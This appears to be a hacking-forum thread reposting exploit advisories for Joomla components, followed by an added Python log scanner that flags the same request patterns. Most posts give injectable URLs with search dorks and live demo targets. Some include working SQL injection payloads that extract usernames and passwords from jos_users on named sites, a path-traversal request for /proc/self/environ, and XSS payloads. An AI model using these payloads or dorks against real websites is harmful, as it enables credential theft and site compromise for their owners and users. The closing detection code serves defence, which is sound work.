    Jreservation is a specially designed component for hotel owners who provides lodging facility & online booking for the rooms like deluxe, Air conditioned, Non Air conditioned. By using this Joomla 1.5 Jreservation component you can add multiple room types, amenity types like room amenity or property amenity. Amenity are like additional services which the hotel owner provides with the room e.g. Telephone, internet connection, cable connection and property amenity like swimming pool, gym, etc. With the help of a calendar the user or a customer of the hotel can check rooms availability also book room as a provisional booking.
    
    Features of Joomla 1.5 Jreservation component :-
    1.Native Joomla 1.5
    2.Multiple properties are supported.
    2.Admin can add / edit rooms/ room types
    3 Admin can add / edit rooms/ rooms.
    4.Admin can add / edit room amenities/ Property amenities.
    5.Detailed search for user to search for available rooms.
    4.Hotel owner can show hotel images in a slideshow.
    5.Owner can upload multiple images to the admin.
    6.Owner can add multiple rooms,room type, room rent in an easy way.
    
    ###############################################################################################################
    
    Xploit: SQLi Vulnerability
    
    DEMO  URL:
    
           http://jforjoomla.com/cd-hotel/Property-Cpanel.html?pid=[SQLi]
    
    ###############################################################################################################
    
    Xploit: XSS Vulnerability
    
    DEMO URL :
    
        http://jforjoomla.com/cd-hotel/Property-Cpanel.html?pid=">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>
    
    ###############################################################################################################
    # 0day no more
    # Sid3^effects 
    
    Joomla com_jsubscription SQL Injection Vulnerability
    Code:
    Name : Joomla com_jsubscription SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    ###############################################################################################################
    Description:
    
    Joomla com_jsubscription from ijoobi suffers from sql injection vulnerability .
    
    
    ###############################################################################################################
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jsubscription&controller=subscription&task=[sqli]
    
    ###############################################################################################################
    # 0day no more
    # Sid3^effects 
    
    Joomla Component com_jmarket SQL Injection Vulnerability
    Code:
    Name : Joomla com_jmarket SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Dork: inurl:com_jmarket
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    ###############################################################################################################
    Description:
    
    Joomla com_jmarket from ijoobi suffers from sql injection vulnerability .
    
    
    ###############################################################################################################
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jmarket&controller=product&task=[sqli]
    
    ###############################################################################################################
    # 0day no more
    # Sid3^effects 
    
    Joomla Component com_jcommunity SQL Injection Vulnerability
    Code:
    Name : Joomla com_jcommunity SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Dork: inurl:com_jcommunity
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    ###############################################################################################################
    Description:
    
    Joomla com_jcommunity from ijoobi suffers from sql injection vulnerability .
    
    
    ###############################################################################################################
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jcommunity&controller=members&task=[sqli]
    
    ###############################################################################################################
    # 0day no more
    # Sid3^effects 
    
    Joomla Component com_jtickets SQL Injection Vulnerability
    Code:
    Name : Joomla com_jtickets SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Dork: inurl:com_jtickets
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    ###############################################################################################################
    Description:
    
    Joomla com_jtickets from ijoobi suffers from sql injection vulnerability .
    
    
    ###############################################################################################################
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jtickets&controller=ticket&task=[sqli]
    
    ###############################################################################################################
    # 0day no more
    # Sid3^effects
    
    Joomla Component com_jstore SQL Injection Vulnerability
    Code:
    Name : Joomla com_jstore SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Dork: inurl:com_jstore
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    #######################################################################################################
    
    ########
    Description:
    
    Joomla com_jstore from ijoobi suffers from sql injection vulnerability .
    
    
    #######################################################################################################
    
    ########
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jstore&controller=product-display&task=[sqli]
    
    #######################################################################################################
    
    ########
    # 0day no more
    # Sid3^effects 
    
    Joomla Component com_jnewsletter SQL Injection Vulnerability
    Code:
    Name : Joomla com_jnewsletter SQLi Vulnerability
    Date : june, 9 2010
    Vendor url :http://ijoobi.com
    Dork: inurl:com_jnewsletter
    Platform: Windows
    Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
    special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
    greetz to :All ICW members.
    
    ###############################################################################################################
    Description:
    
    Joomla com_jnewsletter from ijoobi suffers from sql injection vulnerability .
    
    
    ###############################################################################################################
    
    Xploit: SQLi Vulnerability
    
    DEMO URL :
    
        http://demo.ijoobi.com/index.php?option=com_jstore&controller=product-display&task=[sqli]
    
    ###############################################################################################################
    # 0day no more
    # Sid3^effects 
    
    Joomla Components com_jlinks SQL Injection Vulnerability
    Code:
    Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
    Exploit Title:Joomla com_jlinks SQL Injection Vulnerability
    Vendor url:http://ijoobi.com
    Published: 2010-06-10
    Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members
    
    #####################################################################################################################################################################################################
    
    Description:
    
    Joomla com_jlinks from ijoobi suffers from sql injection vulnerability .
    
    
    #######################################################################################################################################################################################################
    
    Vulnerability:
    
    *SQLi Vulnerability
    
    DEMO URL :http://demo.ijoobi.com/index.php?option=com_jlinks&Itemid=[sqli]
    
    # 0day n0 m0re #
    
    Joomla Components com_jbounceback SQL Injection Vulnerability
    Code:
    Exploit Title:Joomla com_jbounceback SQL Injection Vulnerability
    Vendor url:http://ijoobi.com
    Published: 2010-06-10
    Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members
    
    #####################################################################################################################################################################################################
    
    Description:
    
    Joomla com_jbounceback from ijoobi suffers from sql injection vulnerability .
    
    
    #######################################################################################################################################################################################################
    
    Vulnerability:
    
    *SQLi Vulnerability
    
    DEMO URL :http://demo.ijoobi.com/index.php?option=com_jbounceback&Itemid=[sqli]
    
    Joomla Components com_jiptracker SQL Injection Vulnerability
    Code:
    Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
    Exploit Title:Joomla com_jiptracker SQL Injection Vulnerability
    Vendor url:http://ijoobi.com
    Published: 2010-06-10
    Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members
    
    #####################################################################################################################################################################################################
    
    Description:
    
    Joomla com_jiptracker from ijoobi suffers from sql injection vulnerability .
    
    
    #######################################################################################################################################################################################################
    
    Vulnerability:
    
    *SQLi Vulnerability
    
    DEMO URL :http://demo.ijoobi.com/index.php?option=com_jiptracker&Itemid=[sqli]
    
    # 0day n0 m0re #
    
    Joomla Components com_rsgallery SQL Injection Vulnerability
    Code:
    Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
    Exploit Title:Joomla com_rsgallery SQL Injection Vulnerability
    Vendor url:http://ijoobi.com
    Published: 2010-06-10
    Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members
    
    Description:
    
    Joomla com_rsgallery from ijoobi suffers from sql injection vulnerability .
    
    
    #######################################################################################################################################################################################################
    
    Vulnerability:
    
    *SQLi Vulnerability
    
    DEMO URL :http://demo.ijoobi.com/index.php?option=com_rsgallery2&Itemid=[sqli]
    
    # 0day n0 m0re #
    Joomla Components com_content SQL Injection Vulnerability
    Code:
    Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
    Exploit Title:Joomla com_content SQL Injection Vulnerability
    Vendor url:http://jforjoomla.com
    Published: 2010-06-10
    Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to all ICW members
    
    #####################################################################################################################################################################################################
    
    Description:
    
    Joomla com_content from jforjoomla suffers from sql injection vulnerability .
    
    
    #######################################################################################################################################################################################################
    
    Vulnerability:
    
    *SQLi Vulnerability
    
    DEMO URL :http://jforjoomla.com/cd-hotel/index.php?option=com_content&view=article&id=[sqli]
    
    # 0day n0 m0re #
    (c) httр://inj3сt0r.соm/​
     
    Last edited: 10 Jun 2010
    10 Jun 2010
  16. Hookman
    Hookman Developer Global Moderator
    Likes:
    241
    Joomla Component com_jsupport SQLi and XSS

    SQLi:
    Code:
    # Exploit Title: Joomla Component com_jsupport SQL Injection Vulnerability
    # Date: 12.11.2010
    # Author: Valentin
    # Category: webapps/0day
    # Version: 1.5.6
    
    # Tested on:
    # CVE :  
    # Code : 
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
    >> General Information 
    Advisory/Exploit Title = Joomla Component com_jsupport SQL Injection Vulnerability
    Author = Valentin Hoebel
    Contact = valentin@xenuser.org
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
    >> Product information
    Name = JSupport
    Vendor = Extension Depot
    Vendor Website = http://www.extensiondepot.com/extensions/jsupport.html
    Affected Version(s) = 1.5.6
    
     
    [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
    >> SQL Injection
    This vulnerability can be found by viewing the component in the Joomla administrator
    backend.
    
    Examples:
    administrator/index.php?option=com_jsupport&task=listTickets&alpha=[SQL Injection]
    administrator/index.php?option=com_jsupport&task=listFaqs&alpha=[SQL Injection]
    
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
    >> Additional Information
    Advisory/Exploit Published = 12.11.2010
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
    >> Misc
    Greetz = cr4wl3r, JosS, packetstormsecurity.org, exploit-db.com
    
    
    [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]
    XSS:
    Code:
    # Exploit Title: Joomla Component com_jsupport Critical XSS Vulnerability
    # Date: 12.11.2010
    # Author: Valentin
    # Category: webapps/0day
    # Version: 1.5.6
    
    # Tested on:
    # CVE :  
    # Code : 
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
    >> General Information 
    Advisory/Exploit Title = Joomla Component com_jsupport Critical XSS Vulnerability
    Author = Valentin Hoebel
    Contact = valentin@xenuser.org
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
    >> Product information
    Name = JSupport
    Vendor = Extension Depot
    Vendor Website = http://www.extensiondepot.com/extensions/jsupport.html
    Affected Version(s) = 1.5.6
    
     
    [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
    >> Critical XSS Vulnerability
    The component allows you to create and submit tickets. The tickets can be viewed
    on the website and in the admin panel.
    
    It is possible to inject arbitrary HTML and JS/VBS code into the title field of the
    ticket. If someone else views the ticket list, the code gets executed in the
    visitor's browser.
    
    This vulnerability is considered as critical since the tickets are also displayed
    in the administrator backend of Joomla. As soon as a user with extended privileges
    views the ticket list in the backend, the code gets executed and damage can be caused.
    
    Example code for the ticket title field:
    "><IMG """><SCRIPT>alert("XSS")</SCRIPT>
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
    >> Additional Information
    Advisory/Exploit Published = 12.11.2010
    
    
    [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
    >> Misc
    Greetz = cr4wl3r, JosS, packetstormsecurity.org, exploit-db.com
    
    
    [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]
     
    14 Nov 2010
    1 person likes this.
  17. Hookman
    Hookman Developer Global Moderator
    Likes:
    241
    Joomla Alfurqan15x SQL Injection

    Code:
    #############################################################################################################
    ## Joomla Component com_alfurqan15x SQL injection                                               ##
    ## Author : kaMtiEz (kamtiez@indonesiancoder.com)                                   ##
    ## Homepage : http://www.indonesiancoder.com                                            ##
    ## Date : 16 Nov, 2010                                                                    ##
    #############################################################################################################
    
    [ Software Information ]
    
    [+] Vendor : http://islamis4u.co.cc/
    [+] Download : http://islamis4u.co.cc/index.php?option=com_rokdownloads&view=folder&Itemid=198&id=4%3Aal-furqan-1-5
    [+] version : 2.2 or lower maybe also affected
    [+] Tested On : LocalHost
    [+] Vulnerability : SQL
    [+] Dork : "CiHuY"
    [+] LOCATION : INDONESIA - JOGJA
    
    #############################################################################################################
    
    [ Vulnerable File ]
    
    http://127.0.0.1/[kaMtiEz]/index.php?option=com_alfurqan15x&action=viewayat&surano=[BunciteRs]
    
    [ DEMO ]
    
    http://islamis4u.co.cc/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--
    
    [ FIX ]
    
    dunno :">
    
    
    #############################################################################################################
    
    [ Thx TO ]
    
    
     
    16 Nov 2010
  18. Hookman
    Hookman Developer Global Moderator
    Likes:
    241
    Joomla Component (com_jimtawl) Local File Inclusion Vulnerability

    Code:
    -----------------------------------------------------------------------
         Joomla Component (com_jimtawl) LFI Vulnerability
    -----------------------------------------------------------------------
     
    Author      : Mask_magicianz
    Date        : November, 20/2010
    Location    : Medan, Indonesia
    Time Zone   : GMT +7:00
    Application : Package Jimtawl
    Dork         : com_jimtawl
    Contact     : Mask_magicianz[at]yahoo[dot]com
    http://extensions.joomla.org/extensions/multimedia/streaming-a-broadcasting/audio-broadcasting/4344
    _______________________________________________________________________
     
    http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=[LFI]
    http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00
     
     
    _______________________________________________________________________
     
    Thanks to : All RosebanditZ Team & All IndonesiaCoder
     
    20 Nov 2010
  19. Хулиган
    Хулиган Forum Staff Advanced
    Likes:
    242
    Joomla Component Time Returns (com_timereturns) SQL Injection


    Code:
    #############################################################################################################
    ## Joomla Component Time Returns (com_timereturns) SQL Injection Vulnerability	 ##
    ## Author : kaMtiEz (kamtiez@exploit-id.com)	 ##
    ## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id	 ##
    ## Date : 8 October, 2011 ##
    #############################################################################################################
    [ Software Information ]


    #############################################################################################################

    [ Vulnerable File ]

    Code:
    http://127.0.0.1/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=[num]
    [ XpL ]

    Code:
    http://127.0.0.1/[kaMtiEz]/index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
     
    11 Oct 2011
  20. Fooog
    Fooog Newbie
    Likes:
    1
    QContacts 1.0.6 (Joomla component) SQL injection

    Vulnerability:
    This vulnerability affects /index.php


    Code:
    /index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
     
    11 Dec 2011
    1 person likes this.
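
An added defensive example, not part of any post in this thread: a Python check that flags, in web-server access logs, the request shapes the advisories above show (UNION SELECT in `surano`/`id`, traversal and a NUL byte in `task`, a non-identifier `filter_order`). The sample request lines are constructed, and the parameter rules (numeric ids in Joomla's `7:alias` form, identifier-only sort columns) are assumptions about how these components are normally called.

```python
import re
from urllib.parse import urlsplit, parse_qsl

UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
NUMERIC_ID = re.compile(r"\d+(?::[\w-]+)?")   # "7" or the "7:alias" form (assumed)
IDENTIFIER = re.compile(r"[A-Za-z_][\w.]*")   # plain column name for ORDER BY

NUMERIC_PARAMS = {"id", "itemid", "catid", "surano"}        # assumed integer-typed
DISPATCH_PARAMS = {"task", "controller", "view", "action"}  # select code paths/files

def check_param(name, value):
    """Return the rule names that one decoded query parameter violates."""
    hits = []
    key = name.lower()
    if UNION_SELECT.search(value):
        hits.append("sqli-union-select")
    if key in NUMERIC_PARAMS and not NUMERIC_ID.fullmatch(value):
        hits.append("non-numeric-id")
    if key in DISPATCH_PARAMS and ("../" in value or "..\\" in value or "\x00" in value):
        hits.append("path-traversal")
    if key == "filter_order" and value and not IDENTIFIER.fullmatch(value):
        hits.append("order-by-not-identifier")
    if key == "filter_order_dir" and value.lower() not in ("", "asc", "desc"):
        hits.append("order-dir-not-asc-desc")
    return hits

def scan_request(request_line):
    """Scan one 'METHOD target HTTP/x' log field; return [(param, rule), ...]."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    query = urlsplit(parts[1]).query
    findings = []
    # parse_qsl percent-decodes values, so "+" becomes a space and %00 a NUL byte.
    for name, value in parse_qsl(query, keep_blank_values=True):
        findings.extend((name, rule) for rule in check_param(name, value))
    return findings

# Constructed request lines (not real traffic), modelled on the URL shapes above.
SAMPLE_REQUESTS = [
    "GET /index.php?option=com_alfurqan15x&action=viewayat&surano=-1+UNION+ALL+SELECT+1,2,3,4,5-- HTTP/1.1",
    "GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../proc/self/environ%00 HTTP/1.1",
    "GET /index.php?option=com_qcontacts&catid=0&filter_order=name%2C1&filter_order_Dir= HTTP/1.1",
    "GET /index.php?option=com_timereturns&view=timereturns&id=7 HTTP/1.1",
    "GET /index.php?option=com_content&view=article&id=12:union-select-tips HTTP/1.1",
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(scan_request(line) or "clean", "<-", line)
```

The last two sample lines are benign on purpose: a plain numeric `id` and an article alias containing the words "union-select" must not raise a finding.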
